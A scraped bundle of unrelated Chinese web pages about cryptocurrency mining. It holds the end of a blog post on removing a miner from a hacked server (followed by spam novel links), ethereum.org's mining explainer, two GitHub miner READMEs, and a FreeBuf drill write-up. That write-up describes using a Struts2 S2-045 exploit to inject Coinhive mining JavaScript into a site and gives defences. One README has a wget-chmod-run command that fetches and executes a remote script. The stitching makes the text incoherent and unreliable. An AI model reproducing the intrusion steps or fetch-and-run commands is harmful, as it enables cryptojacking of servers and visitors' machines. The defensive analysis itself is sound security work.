查看定时任务

emmm。黑客也没留个定时任务。

删除挖矿脚本

刚才我们定位到挖矿脚本就是这两个。所以直接用rm -rf zzh zzhs删除即可

zzhs比较好删除,但是zzh这个shell脚本还是有点问题。

处理这个我参考了两篇文章

【Linux被攻击】关于Linux攻击文件在etc目录下无法删除,不能进行任何操作(Operation not permitted) - 掘金 (juejin.cn)

记一次阿里云服务器因Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案 - 掘金 (juejin.cn)

最终的解决流程

直接用chattr改变这个zzh的属性没用

用chmod给chattr加执行权限

rm -rf zzh zzhs删除

确认删除成功

总结

这次被挖矿很可能是我在学redis做东西的时候没设密码被人扫描到了。现在已经把redis停了,看看后续会不会出问题吧。

DaveCui

大数据开发工程师 @SQL Boys

80

文章

165k

阅读

62

粉丝 目录 收起

问题初现

摸索问题

初次定论:被攻击了

可能没被攻击:先处理go程序

尝试干掉go:白忙活

尝试干掉redis:白忙活

尝试干掉mysql:白忙活

阶段性总结:应该就是被攻击了

探查原因

用户登录记录

查看定时任务

删除挖矿脚本

总结

友情链接:

农女王妃忙种田

火烧阿房宫的故事

快穿之我在古代当媒婆小说

宦妃倾城叩见九千岁免费阅读

绘你倾城颜

随身带着聚宝盆如意扇

挖矿 | ethereum.org

ethereum.org跳转至主要内容学习用法构建参与研究搜索​​​​语言 ZH帮助更新此页面本页面有新版本,但现在只有英文版。请帮助我们翻译最新版本。翻译页面没有错误!此页面未翻译,因此特意以英文显示。不再显示Change page概述基础主题以太坊简介以太币简介去中心化应用程序简介Web2 与 Web3 的对比帐户交易区块以太坊虚拟机 (EVM)操作码Gas费用节点和客户端运行节点客户端多样性节点即服务节点架构轻客户端归档节点引导节点网络共识机制工作量证明矿工挖矿算法Dagger-HashimotoEthash权益证明Gasper弱主观性认证权益证明机制的奖励和惩罚权益证明攻击与防御密钥权益证明与工作量证明提出区块权益正明常见问题以太坊堆栈堆栈简介智能合约智能合约语言智能合约结构智能合约库测试用智能合约编译智能合约部署智能合约验证智能合约升级智能合约智能合约安全性智能合约形式化验证可组合性开发网络开发框架以太坊客户端APIJavaScript API后端APIJSON-RPC数据和分析区块浏览器存储集成开发环境 (IDE)编程语言DartDelphi.NETGolangJavaJavaScriptPythonRubyRust语言高级链桥标准令牌标准ERC-20:同质化代币ERC-721:非同质化代币 (NFT)ERC-777ERC-1155ERC-4626最大可提取价值 (MEV)预言机缩放乐观卷叠零知识卷叠状态通道侧链以太坊 Plasma 扩容解决方案Validium数据可用性网络层网络地址门户网络数据结构与编码默克尔前缀树递归长度前缀编码 (RLP)简单序列化 (SSZ)Web3 密钥存储定义设计基础设计和用户体验简介挖矿x上次修改时间: @xiaomage(opens in a new tab), Invalid DateTime查看贡献者在本页面前提条件以太坊挖矿是什么?为什么存在矿工?挖矿成本如何挖掘以太坊交易叔块直观演示挖矿算法相关主题工作量证明不再是以太坊共识机制的基础,这意味着挖矿已终结。 取而代之的是,以太坊将由质押了以太币的验证者保护。 你可以立即开始质押以太币。 阅读更多关于合并、权益证明和质押的信息。 此页面仅展示历史内容。前提条件为了更好地了解此页面,推荐先阅读交易、区块和工作量证明。以太坊挖矿是什么?挖矿是指创建要添加到以太坊区块链的交易块的过程,在以太坊现已弃用的工作量证明架构中进行。挖矿一词源于将加密货币比作黄金的比喻。 黄金或贵金属很稀缺,数字代币也很稀缺,在工作量证明体系中,只能通过挖矿增加总量。 在工作量证明以太坊中,只能通过挖矿进行发行。 然而,与黄金或贵金属不同,以太坊挖矿也是一种通过在区块链中创建、验证、发布和传播区块来保护网络的方式。以太币挖矿 = 保护网络安全挖矿是任何工作量证明区块链的命脉。 在过渡到权益证明之前,以太坊矿工,即运行软件的计算机,利用它的时间和算力处理交易并产生区块。为什么存在矿工?在以太坊这样的去中心化系统中,需要确保每个人都同意交易的顺序。 矿工通过解决计算难题来产生区块并保护网络免受攻击,从而帮助实现这一目标。关于工作量证明的更多信息以前任何人都能使用他们的计算机在以太坊网络上挖矿。 然而,并非每个人都可以通过挖矿实现以太币 (ETH) 获利。 在大多数情况下,矿工必须购买专用计算机硬件,并且能够获得廉价能源。 普通计算机不太可能获得足够的区块奖励来支付相关的挖矿成本。挖矿成本建造和维护矿机所需硬件的潜在成本矿机的电力成本如果你在矿池中挖矿,这些矿池通常对矿池生成的每个区块收取固定百分比的费用支持矿机的潜在成本(通风、能源监测、电线等)要进一步探索挖矿收益,请使用挖矿收益计算器,例如 Etherscan(opens in a new tab) 提供的挖矿收益计算器。如何挖掘以太坊交易以下内容将简要介绍如何在以太坊工作量证明中挖掘交易。 在这里可以找到对以太坊权益证明中该过程的类比介绍。用户编写和通过一些帐户私钥来签署交易请求。用户通过一些节点将自己的交易请求广播到整个以太坊网络。在听到新的转账请求时,每个以太坊网络节点会添加这笔交易到本地的内存池,这些内存池包括他们收到的没有被添加到区块链以承认的所有转账请求。在这个时候,一个挖矿节点将几十或上百个交易请求汇总到潜在区块中,从而尽量多收取交易手续费,同时保证不超出区块燃料限制。 采矿节点将:验证每个交易请求的有效性(例如没有人试图将以太币从他们没有签名的帐户中转移出来,请求是否有格式错误等),然后执行请求的本地代码,改变本地副本 EVM 的状态。 矿工获得每个交易请求的转账的手续费到他们的帐户。一旦在本地 EVM 副本上验证并执行了块中的所有转账请求,就开始为潜在块生成工作证明“合法性证书”。最终,矿工将完成为包含我们特定交易请求的区块生成的证书。 然后,矿工广播完成的区块,其中包括证书和校验新 EVM 状态。其他节点将收到新的区块。 他们将验证证书,执行区块上所有的转账(包括最初由用户广播的交易),然后校验新 EVM 状态,之后执行所有满足 EVM 校验和的转账。 只有这样,这些节点才会将该块附加到区块链的尾部,并接受新的 EVM 状态作为新的规范状态。每个节点将从其未完成的本地内存池的转账请求中删除新区块中已经存在的转账请求。加入网络的新节点将按顺序下载所有块,包括未被打包的交易块。 初始化本地 EVM 副本(作为空白状态的 EVM 开始),在本地 EVM 副本上执行每个块中的每个转账,校验各块的校验和。每个交易都只会被挖掘(首次包含在新区块中并传播)一次,但在推进规范以太坊虚拟机状态的过程中,每个参与者都会执行和验证交易。 这凸显出区块链的核心准则之一:不信任,就验证。叔块基于工作量证明的区块挖掘是概率性的,这意味着有时由于网络延迟而同时公布了两个有效的区块。 在这种情况下,协议必须确定最长链(因此大多数即是最“有效的”),同时针对已提交但未被包含的有效区块,给予矿工部分奖励以确保公平。 这促使网络进一步去中心化,因为小矿工群体可能面临更大的延迟,但仍然可以通过叔块奖励获得收益。对于父区块的同级区块来说,“ommer”一词不分性别,因而为首选,但有时也被称为“uncle”(叔)。 因为以太坊切换到权益证明机制后,叔块就不会被挖掘了,因为每个时隙中只选择了一名提议者。 通过查看被挖掘叔块的历史图表(opens in a new tab),你可以看到这种变化。直观演示跟随 Austin 了解挖矿和工作量证明区块链。挖矿算法以太坊主网只使用过一种挖矿算法 -“Ethash”。 Ethhash 是一种初始研发挖矿算法“Dagger-Hashimoto”的后续版本。有关挖矿算法的更多信息。相关主题燃料以太坊虚拟机工作量证明back-to-top ↑本文对你有帮助吗?是否前一页工作量证明下一页挖矿算法编辑页面(opens in a new tab)在本页面前提条件以太坊挖矿是什么?为什么存在矿工?挖矿成本如何挖掘以太坊交易叔块直观演示挖矿算法相关主题网站最后更新: 2024年2月16日(opens in a new tab)(opens in a new tab)(opens in a new tab)使用以太坊查找钱包获取以太币Dapps - 去中心化应用二层网络运行节点稳定币质押ETH学习学习中心什么是以太坊?什么是以太币 (ETH)?以太坊钱包Gas fees以太坊安全和预防欺诈措施什么是 Web3?智能合约以太坊能源消耗以太坊路线图以太坊改进提案 (Eip)以太坊的历史以太坊白皮书以太坊词汇表以太坊治理区块链桥零知识证明测试中心开发者开始体验相关文档教程通过编码来学习设置本地环境生态系统社区中心以太坊基金会以太坊基金会的博客(opens in a new tab)生态系统支持方案(opens in a new tab)以太坊漏洞悬赏计划生态系统资助计划以太坊品牌资产Devcon(opens in a new tab)企业级应用主网以太坊私密以太坊企业级应用关于ethereum.org关于我们工作机会参与贡献语言支持隐私政策使用条款缓存政策联系我们(opens in a new t

GitHub - aohas/MinerPool: 比特币等 虚拟货币三种常用的矿池挖矿方法总结脚本windows linux mac 系统的脚本(minerd cuda sgminer)

GitHub - aohas/MinerPool: 比特币等 虚拟货币三种常用的矿池挖矿方法总结脚本windows linux mac 系统的脚本(minerd cuda sgminer)

Skip to content

Toggle navigation

Sign in

Product

Actions

Automate any workflow

Packages

Host and manage packages

Security

Find and fix vulnerabilities

Codespaces

Instant dev environments

Copilot

Write better code with AI

Code review

Manage code changes

Issues

Plan and track work

Discussions

Collaborate outside of code

Explore

All features

Documentation

GitHub Skills

Blog

Solutions

For

Enterprise

Teams

Startups

Education

By Solution

CI/CD & Automation

DevOps

DevSecOps

Resources

Learning Pathways

White papers, Ebooks, Webinars

Customer Stories

Partners

Open Source

GitHub Sponsors

Fund open source developers

The ReadME Project

GitHub community articles

Repositories

Topics

Trending

Collections

Pricing

Search or jump to...

Search code, repositories, users, issues, pull requests...

Search

Clear

Search syntax tips

Provide feedback

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

Cancel

Submit feedback

Saved searches

Use saved searches to filter your results more quickly

Name

Query

To see all available qualifiers, see our documentation.

Cancel

Create saved search

Sign in

Sign up

You signed in with another tab or window. Reload to refresh your session.

You signed out in another tab or window. Reload to refresh your session.

You switched accounts on another tab or window. Reload to refresh your session.

Dismiss alert

aohas

/

MinerPool

Public

Notifications

Fork

13

Star

50

比特币等 虚拟货币三种常用的矿池挖矿方法总结脚本windows linux mac 系统的脚本(minerd cuda sgminer)

50

stars

13

forks

Branches

Tags

Activity

Star

Notifications

Code

Issues

0

Pull requests

0

Actions

Projects

0

Security

Insights

Additional navigation options

Code

Issues

Pull requests

Actions

Projects

Security

Insights

aohas/MinerPool

This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

 masterBranchesTagsGo to fileCodeFolders and filesNameNameLast commit messageLast commit dateLatest commit History10 Commitsamdminer_winamdminer_win  ccminer-x64-2.2.1-cuda9rc/ccminer-x64-2.2.1ccminer-x64-2.2.1-cuda9rc/ccminer-x64-2.2.1  cgminer-4.10.0-windowscgminer-4.10.0-windows  cgminer_366_keccak_win32cgminer_366_keccak_win32  cudaminercudaminer  linuxlinux  linuxsgminer561linuxsgminer561  macmac  mac_cgminer-4.3.3mac_cgminer-4.3.3  maxcpuminer-win64maxcpuminer-win64  pooler-cpuminer-2.4.5-win64pooler-cpuminer-2.4.5-win64  sh3cgminer-3.7.3-kalrothmaxsh3cgminer-3.7.3-kalrothmax  winsgminer561winsgminer561  .DS_Store.DS_Store  MacMiner.app-1.5.42.zipMacMiner.app-1.5.42.zip  README.mdREADME.md  amdminer_win.cmdamdminer_win.cmd  ccminer-x64-2.2.1-cuda9rc.7zccminer-x64-2.2.1-cuda9rc.7z  ccminer_win.cmdccminer_win.cmd  cg_mac.shcg_mac.sh  cg_win.cmdcg_win.cmd  cudamin_win.cmdcudamin_win.cmd  cudamin_win86.cmdcudamin_win86.cmd  epc_minerd_mac.shepc_minerd_mac.sh  max_cg_win.cmdmax_cg_win.cmd  max_cudamin_win.cmdmax_cudamin_win.cmd  max_minerd_win.cmdmax_minerd_win.cmd  minerd_linux.shminerd_linux.sh  minerd_mac.shminerd_mac.sh  minerd_win.cmdminerd_win.cmd  sgminer_win.cmdsgminer_win.cmd  x11_sgminer_linux.cmdx11_sgminer_linux.cmd  x11_sgminer_win.cmdx11_sgminer_win.cmd  View all filesRepository files navigationREADME#MinerPool

虚拟货币三种常用的矿池挖矿方法总结脚本:

1 CPU 挖矿 minerd

sh minerd_linux.sh

minerd_win.cmd

sh minerd_mac.sh

2 A卡挖矿

amdminer_win.cm //cgminer

sgminer_win.cmd

3 N卡挖矿

cudamin_win.cmd

MAC 电脑上挖矿软件

MacMiner.app-1.5.42.zip MacMiner需要解压缩安装

在使用以上脚本时,需要修改矿池的地址和矿工

比如:minerd.exe --timeout=6 --url=stratum+tcp://stratum.aikapool.com:7912 --userpass=aohas.aohas7:888888

欢迎访问www.aohas.com

欢迎来邮件沟通: aohas@outlook.com

About

比特币等 虚拟货币三种常用的矿池挖矿方法总结脚本windows linux mac 系统的脚本(minerd cuda sgminer)

Resources

Readme

Activity

Stars

50

stars

Watchers

7

watching

Forks

13

forks

Report repository

Releases

No releases published

Packages

0

No packages published

Languages

C

98.2%

PHP

1.8%

HTML

0.0%

Python

0.0%

Batchfile

0.0%

Perl

0.0%

Footer

© 2024 GitHub, Inc.

Footer navigation

Terms

Privacy

Security

Status

Docs

Contact

Manage cookies

Do not share my personal information

You can’t perform that action at this time.

攻防演练丨Coinhive网页挖矿详解 - FreeBuf网络安全行业门户

攻防演练丨Coinhive网页挖矿详解 - FreeBuf网络安全行业门户

主站 分类

漏洞

工具

极客

Web安全

系统安全

网络安全

无线安全

设备/客户端安全

数据安全

安全管理

企业安全

工控安全

特色

头条

人物志

活动

视频

观点

招聘

报告

资讯

区块链安全

标准与合规

容器安全

公开课

报告 专辑 ···公开课···商城···

用户服务

··· 行业服务

政 府

CNCERT

CNNVD

会员体系(甲方)

会员体系(厂商)

产品名录

企业空间

知识大陆 搜索 创作中心 登录注册 官方公众号企业安全新浪微博 FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。 FreeBuf+小程序把安全装进口袋 攻防演练丨Coinhive网页挖矿详解

关注

终端安全 攻防演练丨Coinhive网页挖矿详解

2018-11-27 10:00:41

近期“网页挖矿”出现在了我们的视野。网页挖矿是一种利用网站前端javascript进行挖矿的一种行为,目前主要利用CoinHive和JSEcoin这两个手段进行网页挖矿,除此之外还有利用Webmine,Cryptoloot,Webmine等进行挖矿。通过对近期出现的“网页挖矿”事件的分析,发现几乎都是利用Coinhive。整个攻击过程一般都是通过某些web漏洞对网站的文件进行篡改,这个操作往往不需要太高的系统权限,整个过程也非常容易操作。 到这一步就完成了整个网页挖矿病毒的构建。这种挖矿与普通的挖矿不同,采用coinhive网页挖矿是攻击者将自己的钱包地址给了第三方,然后通过与第三方的代理矿池交互去实现的网页挖矿。第三方会收取一定的比率的算力,是一种代理挖矿的模式。流程:1.受害者访问了被黑客挂了JS挖矿代码的网站;2.之后,受害者的浏览器会请求coinhive服务器中的coinhive.min.js文件;3.执行coinhive的JS代码,会去请求代理矿池;4.开始与代理矿池交互;5.代理矿池会与总矿池交互;6.在代理矿池中挖取的门罗币币会弄到黑客提交的钱包地址里面;一、攻防演练 为了清楚了解coinhive网页挖矿的攻击过程,我们搭建了如下的拓扑图:PS.部署AF,仅启用访问控制,模拟真实环境,其他功能及安全感知平台仅做监控。目标某日访问量400+IP站点,各种扫描探测工具一通扫描,发现了目标站点存在Struts2漏洞:一下子就发现可以直接命令执行的漏洞,赶紧看看目标站点的具体信息,方便等会修改POC脚本使用。网上找了一个s2-045的Poc,动手修改后就将攻击脚本上传到之前抓到的肉鸡上。启动攻击脚本,输入存在漏洞的目标URL开始攻击:脚本执行完后的成功后,打开了火狐浏览器确认一下是否已经植入成功,访问目标站点的任意页面可以看到文本末尾添加了coinhive的js代码,这时候就可以等待收获了:小白作为这个网站的常客,经常在这个网站观看视频,最近发现浏览网站的时候电脑非常卡,CPU利用率很高: 但只要关闭网站,CPU就恢复正常了:02攻击详解 漏洞利用分析Str2_045漏洞的利用代码,构造了相应的exp,能够通过输入存在漏洞页面,然后执行cmd指令: 运行指令分析写入covin.js文件的base64编码,写入的文件为evil.txt,为下一步做准备:对evil.txt进行base64解码,解码文件为evil.ps2,这是一个可执行的shell文件:最后使用powershell执行shell文件,对网站下的文件植入挖矿代码:Powershell脚本文件如下: 植入的挖矿代码如下:网站运营方:定时对网站进行扫描;及时修复网站漏洞;及时给电脑打补丁,修复漏洞;安装专业的服务器安全防护软件;关闭不必要的目录权限。网站浏览者:开启浏览器内置拦截功能;安装拦截插件进行防范;安装“反挖矿”安全防护软件。 *本文作者:千里目安全实验室,转载请注明来自FreeBuf.COM 本文作者:,

转载请注明来自FreeBuf.COM # 挖矿 # CoinHive

被以下专辑收录,发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多

相关推荐

关 注 0 文章数 0 关注者 本站由阿里云 提供计算与安全服务 用户服务 有奖投稿 提交漏洞 参与众测 商城 企业服务 安全咨询 产业全景图 企业SRC 安全众测 合作信息 斗象官网 广告投放 联系我们 友情链接 关于我们 关于我们 加入我们 微信公众号 新浪微博 战略伙伴 FreeBuf+小程序 扫码把安全装进口袋 斗象科技 FreeBuf 漏洞盒子 斗象智能安全平台 免责条款 协议条款

Copyright © 2020 WWW.FREEBUF.COM All Rights Reserved

   沪ICP备13033796号

|

沪公安网备

GitHub - dovela/xmr-stak-auto: 一键全自动挖矿,躺着赚钱,看不懂官方文档的可以试试

GitHub - dovela/xmr-stak-auto: 一键全自动挖矿,躺着赚钱,看不懂官方文档的可以试试

Skip to content

Toggle navigation

Sign in

Product

Actions

Automate any workflow

Packages

Host and manage packages

Security

Find and fix vulnerabilities

Codespaces

Instant dev environments

Copilot

Write better code with AI

Code review

Manage code changes

Issues

Plan and track work

Discussions

Collaborate outside of code

Explore

All features

Documentation

GitHub Skills

Blog

Solutions

For

Enterprise

Teams

Startups

Education

By Solution

CI/CD & Automation

DevOps

DevSecOps

Resources

Learning Pathways

White papers, Ebooks, Webinars

Customer Stories

Partners

Open Source

GitHub Sponsors

Fund open source developers

The ReadME Project

GitHub community articles

Repositories

Topics

Trending

Collections

Pricing

Search or jump to...

Search code, repositories, users, issues, pull requests...

Search

Clear

Search syntax tips

Provide feedback

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

Cancel

Submit feedback

Saved searches

Use saved searches to filter your results more quickly

Name

Query

To see all available qualifiers, see our documentation.

Cancel

Create saved search

Sign in

Sign up

You signed in with another tab or window. Reload to refresh your session.

You signed out in another tab or window. Reload to refresh your session.

You switched accounts on another tab or window. Reload to refresh your session.

Dismiss alert

This repository has been archived by the owner on Aug 31, 2022. It is now read-only.

dovela

/

xmr-stak-auto

Public archive

forked from fireice-uk/xmr-stak

Notifications

Fork

14

Star

25

一键全自动挖矿,躺着赚钱,看不懂官方文档的可以试试

License

GPL-3.0 license

25

stars

1.8k

forks

Branches

Tags

Activity

Star

Notifications

Code

Issues

2

Pull requests

0

Actions

Projects

0

Security

Insights

Additional navigation options

Code

Issues

Pull requests

Actions

Projects

Security

Insights

dovela/xmr-stak-auto

This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

 masterBranchesTagsGo to fileCode  Folders and filesNameNameLast commit messageLast commit dateLatest commit History963 Commits.github.github  CICI  docdoc  scripts/build_xmr-stak_dockerscripts/build_xmr-stak_docker  xmrstakxmrstak  .appveyor.yml.appveyor.yml  .gitattributes.gitattributes  .gitignore.gitignore  .travis.yml.travis.yml  CMakeLists.txtCMakeLists.txt  CONTRIBUTING.mdCONTRIBUTING.md  DockerfileDockerfile  LICENSELICENSE  OneClickMine.shOneClickMine.sh  README.mdREADME.md  THIRD-PARTY-LICENSESTHIRD-PARTY-LICENSES  View all filesRepository files navigationREADMEGPL-3.0 license一键挖矿脚本

又造了个没用的轮子,一键挖矿,跟着步骤走就行了。

支持的系统

Ubuntu18.04.1 Ubuntu16.04.5 实测通过

Centos7 和 Debian8 也做了适配,应该可行,未测试

目前仅支持cpu挖矿,可以自己改脚本使用gpu

使用方法

wget -N --no-check-certificate https://raw.githubusercontent.com/dovela/xmr-stak/master/OneClickMine.sh

chmod +x OneClickMine.sh

./OneClickMine.sh

#特别说明

默认矿池地址 https://www.supportxmr.com 或 https://xmr.nanopool.org/

所需配置可以从 https://www.supportxmr.com/#/help/config_generator 中查看

使用vps挖矿请遵守服务商使用条款,因挖矿造成的一切收益和损失与本人无关

珍爱vps,远离挖矿,血的教训

感谢

@Toyo https://github.com/ToyoDAdoubi

及许多贡献自己知识的博客

另:求求大矿场赏口饭吃吧,本人钱包49EJKgLMGCSFTEx5R7MTUPdhCrY8CjCiPMgLfRWcjh7eYf92f4FQ9PyCKDfBKNJ2EASBF9GB3yYeBKnVm4rGXhwG8ahAWdS

About

一键全自动挖矿,躺着赚钱,看不懂官方文档的可以试试

Resources

Readme

License

GPL-3.0 license

Activity

Stars

25

stars

Watchers

1

watching

Forks

14

forks

Report repository

Releases

11

tags

Packages

0

No packages published

Languages

C++

75.2%

C

18.1%

Cuda

2.9%

CMake

1.5%

Shell

1.1%

Smarty

1.1%

Dockerfile

0.1%

Footer

© 2024 GitHub, Inc.

Footer navigation

Terms

Privacy

Security

Status

Docs

Contact

Manage cookies

Do not share my personal information

You can’t perform that action at this time.